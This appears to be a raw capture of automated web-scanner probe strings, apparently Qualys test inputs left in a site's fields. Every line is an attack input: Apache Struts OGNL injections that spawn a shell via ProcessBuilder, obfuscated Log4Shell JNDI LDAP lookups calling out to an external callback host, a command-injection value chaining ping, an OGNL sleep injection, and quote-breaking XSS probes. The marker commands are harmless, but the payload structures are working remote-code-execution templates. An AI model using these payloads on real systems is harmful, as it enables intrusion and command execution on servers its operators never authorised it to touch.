%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e5c6c2cb7cb116382fecfcadc0d13467fd353e87.22083937646011261.3252451661.log4j10.log4j.us3.qualysperiscope.com./QualysWAS}
${url:UTF-8::https://19d028868139bf947eaaa6b5f09969fc4cc7fc76.22083937646011261.4266182421.oscomm17.oscomm.us3.qualysperiscope.com./}
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
1
“‘>
1″>
1′
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
(23.0231*213.759)
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e5c6c2cb7cb116382fecfcadc0d13467fd353e87.22083937646011261.3252451661.log4j10.log4j.us3.qualysperiscope.com./QualysWAS}
${url:UTF-8::https://19d028868139bf947eaaa6b5f09969fc4cc7fc76.22083937646011261.4266182421.oscomm17.oscomm.us3.qualysperiscope.com./}
http://localhost:19096
1
aaaa&ping -n 92 localhost&
1
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
https://www.qualys.com
https://www.qualys.com?comment=1